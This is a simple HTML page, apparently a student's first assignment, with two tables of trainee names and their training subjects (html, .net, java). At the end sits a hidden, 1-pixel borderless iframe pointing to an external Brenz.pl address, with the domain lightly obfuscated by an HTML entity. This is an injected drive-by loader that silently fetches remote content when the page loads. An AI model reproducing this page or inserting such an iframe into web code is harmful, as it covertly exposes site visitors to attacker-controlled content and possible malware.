<html> <head>
<title>
 first assignment </title>
</head>
<body bgcolor="#FF0000">
<table border="4" cellspacing="6">
<tr>
<th colspan=2>6 Week Traning</th>
</tr>


<tr>
<th>Student Name</th>
<th>In Which Traning</th>
</tr>

<tr>
<td>rohit</td>
<td>html</td>
</tr>

<tr>
<td>rajja</td>
<td>.net</td>
</tr>

<tr>
<td>bau</td>
<td>java</td>
</tr>


</table>


<table border="4" cellpadding="9">
<tr>
<th colspan=2>6 Week Traning</th>
</tr>

<tr>
<th>Student Name</th>
<th>In Which Traning</th>
</tr>

<tr>
<td>rohit</td>
<td>html</td>
</tr>
<tr>
<td>bau</td>
<td>java</td>
</tr>


</table>

<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>
</body>
</html>

